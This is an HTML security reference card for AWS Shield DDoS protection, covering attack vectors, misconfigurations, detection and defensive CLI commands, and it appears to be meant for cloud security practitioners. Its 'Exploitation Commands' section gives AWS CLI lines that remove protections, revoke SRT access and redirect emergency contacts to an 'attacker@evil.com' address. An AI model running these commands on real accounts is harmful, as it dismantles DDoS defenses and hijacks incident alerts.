-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathshield.html
More file actions
497 lines (473 loc) · 25.6 KB
/
shield.html
File metadata and controls
497 lines (473 loc) · 25.6 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>AWS Shield Security | AWS Security Cards</title>
<meta name="description" content="AWS Shield provides DDoS protection at two tiers: Standard (free, Layer 3/4) and Advanced (paid, Layer 7 with SRT access and cost protection).">
<style>
*, *::before, *::after { box-sizing: border-box; margin: 0; padding: 0; }
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', sans-serif;
background: #0a0e1a;
color: #e2e8f0;
line-height: 1.6;
padding: 2rem;
max-width: 1200px;
margin: 0 auto;
}
a { color: #22d3ee; text-decoration: none; }
a:hover { text-decoration: underline; }
/* Card Image */
.card-image {
border-radius: 1rem;
overflow: hidden;
margin-bottom: 2rem;
border: 1px solid rgba(255,255,255,0.1);
}
.card-image img {
width: 100%;
height: auto;
display: block;
}
/* Header */
.header {
position: relative;
overflow: hidden;
border-radius: 1rem;
background: linear-gradient(135deg, #3b82f615, #0a0e1a, #0ea5e915);
border: 1px solid #3b82f64d;
padding: 2.5rem;
margin-bottom: 2rem;
}
.header::before {
content: '';
position: absolute;
top: 0; right: 0;
width: 24rem; height: 24rem;
background: #3b82f60d;
border-radius: 50%;
filter: blur(3rem);
}
.header-content { position: relative; display: flex; align-items: flex-start; gap: 1.5rem; }
.header-icon { width: 64px; height: 64px; flex-shrink: 0; }
.header-icon img { width: 100%; height: 100%; }
.header-title { font-size: 1.875rem; font-weight: 700; color: #fff; }
.header-badge {
display: inline-block;
padding: 0.25rem 0.75rem;
background: #3b82f633;
color: #3b82f6;
font-size: 0.8rem;
font-weight: 600;
border-radius: 999px;
border: 1px solid #3b82f64d;
margin-left: 0.75rem;
vertical-align: middle;
}
.header-desc { color: #94a3b8; max-width: 42rem; margin-top: 0.5rem; }
/* Stats */
.stats-row { display: grid; grid-template-columns: repeat(4, 1fr); gap: 1rem; margin-bottom: 2rem; }
.stat-card {
background: rgba(255,255,255,0.03);
border-radius: 0.5rem;
border: 1px solid rgba(255,255,255,0.06);
padding: 1rem;
text-align: center;
}
.stat-value { font-size: 1.5rem; font-weight: 700; }
.stat-label { font-size: 0.8rem; color: #94a3b8; }
/* Sections */
.section {
background: rgba(255,255,255,0.03);
border-radius: 0.75rem;
border: 1px solid rgba(255,255,255,0.06);
padding: 1.5rem;
margin-bottom: 1.5rem;
}
.section h2 {
font-size: 1.25rem;
font-weight: 700;
color: #fff;
margin-bottom: 1rem;
display: flex;
align-items: center;
gap: 0.5rem;
}
/* Overview */
.overview-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 1.5rem; }
.overview-grid h4 { font-size: 0.9rem; font-weight: 600; margin-bottom: 0.5rem; }
.overview-grid p { font-size: 0.875rem; color: #94a3b8; margin-bottom: 0.75rem; }
.attack-note {
background: rgba(0,0,0,0.3);
border-radius: 0.5rem;
border: 1px solid rgba(255,255,255,0.06);
padding: 0.75rem;
font-size: 0.875rem;
color: #cbd5e1;
}
/* Risk Gauge */
.risk-gauge { display: flex; align-items: center; gap: 2rem; }
.risk-bar-container { flex: 1; }
.risk-bar {
height: 1rem;
background: #0f172a;
border-radius: 999px;
overflow: hidden;
}
.risk-bar-fill {
height: 100%;
border-radius: 999px;
background: linear-gradient(90deg, #eab308, #f97316, #ef4444);
}
.risk-labels { display: flex; justify-content: space-between; font-size: 0.8rem; color: #94a3b8; margin-top: 0.5rem; }
.risk-score { text-align: center; }
.risk-score-value { font-size: 2.5rem; font-weight: 700; color: #f87171; }
.risk-score-label { font-size: 0.8rem; color: #94a3b8; }
.risk-desc { margin-top: 1rem; font-size: 0.875rem; color: #94a3b8; }
/* Panels Grid */
.panels-grid { display: grid; grid-template-columns: repeat(3, 1fr); gap: 1.5rem; margin-bottom: 1.5rem; }
@media (max-width: 1024px) { .panels-grid { grid-template-columns: repeat(2, 1fr); } }
@media (max-width: 640px) { .panels-grid, .stats-row, .overview-grid { grid-template-columns: 1fr; } }
.panel {
background: rgba(255,255,255,0.03);
border-radius: 0.75rem;
border: 1px solid;
padding: 1.5rem;
}
.panel h3 { font-size: 1.1rem; font-weight: 700; margin-bottom: 1rem; display: flex; align-items: center; gap: 0.5rem; }
.panel h4 { font-size: 0.85rem; font-weight: 600; margin-bottom: 0.5rem; margin-top: 1rem; }
.panel ul { list-style: none; padding: 0; }
.panel li {
font-size: 0.85rem;
color: #cbd5e1;
padding: 0.15rem 0;
display: flex;
align-items: flex-start;
gap: 0.5rem;
}
.bullet { margin-top: 0.15rem; }
.note {
margin-top: 1rem;
padding: 0.75rem;
border-radius: 0.5rem;
font-size: 0.85rem;
}
/* Commands */
.cmd-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 1rem; }
.cmd-block { margin-top: 0.75rem; }
.cmd-title { font-size: 0.8rem; color: #94a3b8; margin-bottom: 0.25rem; }
pre {
background: rgba(0,0,0,0.5);
border-radius: 0.5rem;
padding: 0.75rem;
font-size: 0.8rem;
color: #4ade80;
overflow-x: auto;
border: 1px solid rgba(255,255,255,0.06);
white-space: pre-wrap;
word-break: break-all;
font-family: 'SF Mono', 'Fira Code', 'Cascadia Code', monospace;
}
/* Policies */
.policy-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 1.5rem; }
.policy-card {
border-radius: 0.5rem;
border: 1px solid;
padding: 1rem;
}
.policy-header { display: flex; align-items: center; gap: 0.5rem; margin-bottom: 0.75rem; font-size: 0.9rem; }
.policy-card pre { margin-bottom: 0.75rem; color: #cbd5e1; }
.policy-desc { font-size: 0.8rem; color: #94a3b8; }
/* Defenses */
.defense-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 1rem; }
.defense-card {
background: rgba(255,255,255,0.03);
border-radius: 0.5rem;
border: 1px solid rgba(255,255,255,0.06);
padding: 1rem;
}
.defense-card:hover { border-color: #22d3ee4d; }
.defense-header { display: flex; align-items: flex-start; gap: 0.75rem; }
.defense-icon { font-size: 1.5rem; }
.defense-card h4 { font-size: 0.9rem; font-weight: 600; color: #fff; margin-bottom: 0.25rem; }
.defense-card p { font-size: 0.85rem; color: #94a3b8; margin-bottom: 0.5rem; }
.defense-card pre { color: #22d3ee; }
/* Footer */
.footer { text-align: center; padding: 1.5rem 0; font-size: 0.8rem; color: #64748b; }
.footer a { color: #22d3ee; }
/* Prevent ugly page-break splits */
.card-image,
.header,
.stat-card,
.stats-row,
.section,
.panel,
.cmd-block,
.policy-card,
.defense-card,
.attack-note,
.overview-grid > div,
.risk-gauge,
.note {
break-inside: avoid;
page-break-inside: avoid;
}
.section,
.panels-grid,
.card-image,
.header {
break-before: auto;
page-break-before: auto;
}
/* Keep headings with their content */
h2, h3, h4 {
break-after: avoid;
page-break-after: avoid;
}
@media print {
body { background: #0a0e1a; -webkit-print-color-adjust: exact; print-color-adjust: exact; }
.panels-grid { grid-template-columns: repeat(2, 1fr); }
.cmd-grid { grid-template-columns: 1fr; }
.policy-grid { grid-template-columns: 1fr; }
.defense-grid { grid-template-columns: 1fr; }
}
</style>
</head>
<body>
<!-- Card Image -->
<div class="card-image">
<img src="../images/shield-card.webp" alt="AWS Shield Security" />
</div>
<!-- Header -->
<div class="header">
<div class="header-content">
<div class="header-icon"><img src="../icons/shield.svg" alt="AWS Shield Security" /></div>
<div>
<div>
<span class="header-title">AWS Shield Security</span>
<span class="header-badge">NETWORKING</span>
</div>
<p class="header-desc">AWS Shield provides DDoS protection at two tiers. Shield Standard defends against Layer 3/4 DDoS attacks for free. Shield Advanced extends protection with Layer 7 mitigation, SRT access, cost protection, and proactive engagement. An attacker with account access can disable protections to amplify external DDoS impact.</p>
</div>
</div>
</div>
<!-- Stats -->
<div class="stats-row">
<div class="stat-card">
<div class="stat-value" style="color: #f87171;">HIGH</div>
<div class="stat-label">Risk Level</div>
</div>
<div class="stat-card">
<div class="stat-value" style="color: #4ade80;">Global+Regional</div>
<div class="stat-label">Scope</div>
</div>
<div class="stat-card">
<div class="stat-value" style="color: #60a5fa;">L3/L4/L7</div>
<div class="stat-label">Protection</div>
</div>
<div class="stat-card">
<div class="stat-value" style="color: #c084fc;">$3K/mo</div>
<div class="stat-label">Advanced Cost</div>
</div></div>
<!-- Overview -->
<div class="section"><h2><span style="color:#3b82f6;">📋</span> Service Overview</h2><div class="overview-grid">
<div>
<h4 style="color: #3b82f6;">Shield Standard vs Advanced</h4>
<p>Shield Standard is automatic and free for all AWS customers, covering Layer 3/4. Shield Advanced ($3,000/month) adds Layer 7 mitigation, SRT access, cost protection, health-based detection, and proactive engagement.</p>
<div class="attack-note"><span style="color:#3b82f6;">Attack note:</span> Shield Standard only covers Layer 3/4. Without Shield Advanced, application-layer floods (HTTP floods, DNS query floods) have no automatic mitigation. Attackers target Layer 7 specifically against Standard-only customers.</div>
</div>
<div>
<h4 style="color: #3b82f6;">DDoS Attack Vectors Addressed</h4>
<p>Protects against UDP reflection, SYN floods, DNS amplification, HTTP request floods, and HTTP/2 rapid reset attacks. Shield Advanced subscribers get 24/7 SRT access and automatic application-layer mitigation via AWS WAF.</p>
<div class="attack-note"><span style="color:#3b82f6;">Attack note:</span> An attacker with account access can disable Shield Advanced protections, remove protections from resources, or disassociate health checks to blind detection -- turning account compromise into a DDoS amplifier.</div>
</div></div></div>
<!-- Risk Assessment -->
<div class="section">
<h2>Security Risk Assessment</h2>
<div class="risk-gauge">
<div class="risk-bar-container">
<div class="risk-bar">
<div class="risk-bar-fill" style="width: 70%;"></div>
</div>
<div class="risk-labels"><span>Low</span><span>Medium</span><span>High</span><span>Critical</span></div>
</div>
<div class="risk-score">
<div class="risk-score-value">7.0</div>
<div class="risk-score-label">Risk Score</div>
</div>
</div>
<p class="risk-desc">Shield Standard is automatic, reducing baseline risk. However, organizations without Shield Advanced lack Layer 7 DDoS protection, cost protection, and SRT access. Misconfigured Shield Advanced (missing health checks, no proactive engagement) creates a false sense of security.</p>
</div>
<!-- Main Panels -->
<div class="panels-grid">
<div class="panel" style="border-color: #f8717133;">
<h3 style="color: #f87171;">⚔️ Attack Vectors</h3><h4 style="color: #f87171;">External DDoS Attack Types</h4><ul><li><span class="bullet" style="color: #f87171;">•</span> UDP reflection/amplification (DNS, NTP, memcached)</li><li><span class="bullet" style="color: #f87171;">•</span> SYN flood to exhaust TCP connection state tables</li><li><span class="bullet" style="color: #f87171;">•</span> HTTP request flood (requires Shield Advanced)</li><li><span class="bullet" style="color: #f87171;">•</span> DNS query flood against Route 53 hosted zones</li><li><span class="bullet" style="color: #f87171;">•</span> HTTP/2 rapid reset attack</li></ul><h4 style="color: #f87171;">Account-Level Attack Vectors</h4><ul><li><span class="bullet" style="color: #f87171;">•</span> shield:DeleteProtection removes DDoS protection</li><li><span class="bullet" style="color: #f87171;">•</span> shield:DisassociateHealthCheck blinds detection</li><li><span class="bullet" style="color: #f87171;">•</span> shield:DisableProactiveEngagement prevents SRT contact</li><li><span class="bullet" style="color: #f87171;">•</span> shield:DisassociateDRTRole revokes SRT access</li><li><span class="bullet" style="color: #f87171;">•</span> shield:UpdateSubscription with AutoRenew=DISABLED</li></ul></div>
<div class="panel" style="border-color: #fb923c33;">
<h3 style="color: #fb923c;">⚠️ Misconfigurations</h3><h4 style="color: #fb923c;">Protection Coverage Gaps</h4><ul><li><span class="bullet" style="color: #fb923c;">•</span> Internet-facing resources not added to Shield Advanced</li><li><span class="bullet" style="color: #fb923c;">•</span> No health checks associated with protections</li><li><span class="bullet" style="color: #fb923c;">•</span> Proactive engagement not enabled</li><li><span class="bullet" style="color: #fb923c;">•</span> Emergency contacts not configured</li><li><span class="bullet" style="color: #fb923c;">•</span> Protection groups not defined</li></ul><h4 style="color: #fb923c;">Operational Issues</h4><ul><li><span class="bullet" style="color: #fb923c;">•</span> No WAF web ACL on application-layer resources</li><li><span class="bullet" style="color: #fb923c;">•</span> DRT role not granted for SRT access</li><li><span class="bullet" style="color: #fb923c;">•</span> DRT log bucket not associated</li><li><span class="bullet" style="color: #fb923c;">•</span> Using Advanced without Business/Enterprise Support</li><li><span class="bullet" style="color: #fb923c;">•</span> No Firewall Manager for multi-account deployment</li></ul></div>
<div class="panel" style="border-color: #22d3ee33;">
<h3 style="color: #22d3ee;">🔍 Enumeration</h3><div class="cmd-block">
<div class="cmd-title">Check Subscription Status</div>
<pre><code>aws shield get-subscription-state</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">Describe Subscription Details</div>
<pre><code>aws shield describe-subscription</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">List All Protected Resources</div>
<pre><code>aws shield list-protections</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">List Recent DDoS Attacks</div>
<pre><code>aws shield list-attacks \
--start-time FromInclusive=2026-01-01T00:00:00Z,ToExclusive=2026-03-30T00:00:00Z</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">Check DRT Access Configuration</div>
<pre><code>aws shield describe-drt-access</code></pre>
</div></div>
<div class="panel" style="border-color: #c084fc33;">
<h3 style="color: #c084fc;">📈 Privilege Escalation</h3><h4 style="color: #c084fc;">Direct Escalation Paths</h4><ul><li><span class="bullet" style="color: #c084fc;">•</span> shield:CreateSubscription + shield:CreateProtection causes $3K/month charges</li><li><span class="bullet" style="color: #c084fc;">•</span> shield:AssociateDRTRole grants SRT overly broad access</li><li><span class="bullet" style="color: #c084fc;">•</span> shield:AssociateDRTLogBucket grants SRT read access to S3</li><li><span class="bullet" style="color: #c084fc;">•</span> iam:PassRole + shield:AssociateDRTRole passes privileged role to SRT</li></ul><h4 style="color: #c084fc;">Indirect Escalation Paths</h4><ul><li><span class="bullet" style="color: #c084fc;">•</span> shield:DeleteProtection + external DDoS for financial damage</li><li><span class="bullet" style="color: #c084fc;">•</span> shield:UpdateEmergencyContactSettings redirects SRT notifications</li><li><span class="bullet" style="color: #c084fc;">•</span> shield:EnableApplicationLayerAutomaticResponse with malicious WAF rules</li></ul></div>
<div class="panel" style="border-color: #facc1533;">
<h3 style="color: #facc15;">🔗 Persistence</h3><h4 style="color: #facc15;">Disabling Defenses</h4><ul><li><span class="bullet" style="color: #facc15;">•</span> Delete protections from critical resources before attack</li><li><span class="bullet" style="color: #facc15;">•</span> Disassociate health checks to blind detection</li><li><span class="bullet" style="color: #facc15;">•</span> Disable proactive engagement to prevent SRT contact</li><li><span class="bullet" style="color: #facc15;">•</span> Revoke DRT role access during active attack</li><li><span class="bullet" style="color: #facc15;">•</span> Set AutoRenew=DISABLED to prevent subscription renewal</li></ul><h4 style="color: #facc15;">Maintaining Access</h4><ul><li><span class="bullet" style="color: #facc15;">•</span> Redirect emergency contacts to attacker email</li><li><span class="bullet" style="color: #facc15;">•</span> Associate DRT log bucket to sensitive data</li><li><span class="bullet" style="color: #facc15;">•</span> Modify application-layer automatic response rules</li><li><span class="bullet" style="color: #facc15;">•</span> Remove protection groups to degrade detection</li></ul></div>
<div class="panel" style="border-color: #4ade8033;">
<h3 style="color: #4ade80;">🛡️ Detection</h3><h4 style="color: #4ade80;">CloudTrail Events</h4><ul><li><span class="bullet" style="color: #4ade80;">•</span> DeleteProtection - protection removed</li><li><span class="bullet" style="color: #4ade80;">•</span> DisassociateHealthCheck - health check removed</li><li><span class="bullet" style="color: #4ade80;">•</span> DisableProactiveEngagement - SRT blocked</li><li><span class="bullet" style="color: #4ade80;">•</span> DisassociateDRTRole - SRT access revoked</li><li><span class="bullet" style="color: #4ade80;">•</span> UpdateSubscription - subscription modified</li></ul><h4 style="color: #4ade80;">CloudWatch Metrics</h4><ul><li><span class="bullet" style="color: #4ade80;">•</span> DDoSDetected - active DDoS attack</li><li><span class="bullet" style="color: #4ade80;">•</span> DDoSAttackBitsPerSecond - volumetric attack rate</li><li><span class="bullet" style="color: #4ade80;">•</span> DDoSAttackPacketsPerSecond - packet flood rate</li><li><span class="bullet" style="color: #4ade80;">•</span> DDoSAttackRequestsPerSecond - request flood rate</li></ul></div></div>
<!-- Exploitation -->
<div class="section"><h2><span style="color:#f87171;">💻</span> Exploitation Commands</h2><div class="cmd-grid"><div class="cmd-block">
<div class="cmd-title">Remove Protection from Resource</div>
<pre><code>aws shield delete-protection \
--protection-id abc123-def456</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">Disassociate Health Check</div>
<pre><code>aws shield disassociate-health-check \
--protection-id abc123-def456 \
--health-check-arn arn:aws:route53:::healthcheck/12345678</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">Disable Proactive Engagement</div>
<pre><code>aws shield disable-proactive-engagement</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">Revoke DRT Role Access</div>
<pre><code>aws shield disassociate-drt-role</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">Redirect Emergency Contacts</div>
<pre><code>aws shield update-emergency-contact-settings \
--emergency-contact-list EmailAddress=attacker@evil.com</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">Disable Auto-Renew</div>
<pre><code>aws shield update-subscription \
--auto-renew DISABLED</code></pre>
</div></div></div>
<!-- Policies -->
<div class="section"><h2><span style="color:#4ade80;">📜</span> Policy Examples</h2><div class="policy-grid"><div class="policy-card" style="border-color: #ef444433; background: rgba(239,68,68,0.05);">
<div class="policy-header">
<span style="color: #f87171; font-size: 1.2em;">✗</span>
<span style="color: #f87171; font-weight: 600;">Dangerous - Full Shield Access</span>
</div>
<pre><code>{
"Effect": "Allow",
"Action": "shield:*",
"Resource": "*"
}</code></pre>
<p class="policy-desc">Allows removing protections, revoking DRT access, and fully dismantling DDoS defenses</p>
</div><div class="policy-card" style="border-color: #22c55e33; background: rgba(34,197,94,0.05);">
<div class="policy-header">
<span style="color: #4ade80; font-size: 1.2em;">✓</span>
<span style="color: #4ade80; font-weight: 600;">Secure - Read-Only Monitoring</span>
</div>
<pre><code>{
"Effect": "Allow",
"Action": [
"shield:Describe*",
"shield:List*",
"shield:GetSubscriptionState"
],
"Resource": "*"
}</code></pre>
<p class="policy-desc">Visibility into protections and attack events without ability to modify defenses</p>
</div><div class="policy-card" style="border-color: #22c55e33; background: rgba(34,197,94,0.05);">
<div class="policy-header">
<span style="color: #4ade80; font-size: 1.2em;">✓</span>
<span style="color: #4ade80; font-weight: 600;">Secure - SCP Prevent Disabling</span>
</div>
<pre><code>{
"Effect": "Deny",
"Action": [
"shield:DeleteProtection",
"shield:DisableProactiveEngagement",
"shield:DisassociateDRTRole",
"shield:DisassociateHealthCheck"
],
"Resource": "*"
}</code></pre>
<p class="policy-desc">Prevents anyone from disabling protections or revoking SRT access</p>
</div></div></div>
<!-- Defenses -->
<div class="section"><h2><span style="color:#4ade80;">🛡️</span> Defense Recommendations</h2><div class="defense-grid"><div class="defense-card">
<div class="defense-header">
<span class="defense-icon">🛡️</span>
<div>
<h4>Enable Shield Advanced on All Resources</h4>
<p>Add explicit protections to every CloudFront, ALB, Elastic IP, Global Accelerator, and Route 53 resource.</p>
<pre><code>aws shield create-protection \
--name "prod-alb" \
--resource-arn arn:aws:elasticloadbalancing:us-east-1:123456789012:loadbalancer/app/prod-alb/1234</code></pre>
</div>
</div>
</div><div class="defense-card">
<div class="defense-header">
<span class="defense-icon">❤️</span>
<div>
<h4>Associate Route 53 Health Checks</h4>
<p>Health checks enable faster, more accurate detection and are required for proactive engagement.</p>
<pre><code>aws shield associate-health-check \
--protection-id abc123-def456 \
--health-check-arn arn:aws:route53:::healthcheck/12345678</code></pre>
</div>
</div>
</div><div class="defense-card">
<div class="defense-header">
<span class="defense-icon">📞</span>
<div>
<h4>Enable Proactive Engagement</h4>
<p>Allow the SRT to contact you proactively during detected events. Configure emergency contacts.</p>
<pre><code>aws shield enable-proactive-engagement</code></pre>
</div>
</div>
</div><div class="defense-card">
<div class="defense-header">
<span class="defense-icon">🔐</span>
<div>
<h4>Grant DRT Access with Scoped Role</h4>
<p>Give the SRT access they need during an attack without over-privileging.</p>
<pre><code>aws shield associate-drt-role \
--role-arn arn:aws:iam::123456789012:role/AWSSRTAccessRole</code></pre>
</div>
</div>
</div><div class="defense-card">
<div class="defense-header">
<span class="defense-icon">🤖</span>
<div>
<h4>Enable Auto Application-Layer Mitigation</h4>
<p>Requires an AWS WAF web ACL associated with the protected resource.</p>
<pre><code>aws shield enable-application-layer-automatic-response \
--resource-arn RESOURCE_ARN \
--action Block={}</code></pre>
</div>
</div>
</div><div class="defense-card">
<div class="defense-header">
<span class="defense-icon">📊</span>
<div>
<h4>Create Protection Groups</h4>
<p>Group related resources so Shield Advanced can detect distributed attacks across multiple endpoints.</p>
<pre><code>aws shield create-protection-group \
--protection-group-id "prod-web-tier" \
--aggregation SUM \
--pattern ARBITRARY</code></pre>
</div>
</div>
</div></div></div>
<!-- Footer -->
<div class="footer">
<p>AWS Shield Security Security Card</p>
<p style="margin-top:0.25rem;">Always obtain proper authorization before testing</p>
</div>
</body>
</html>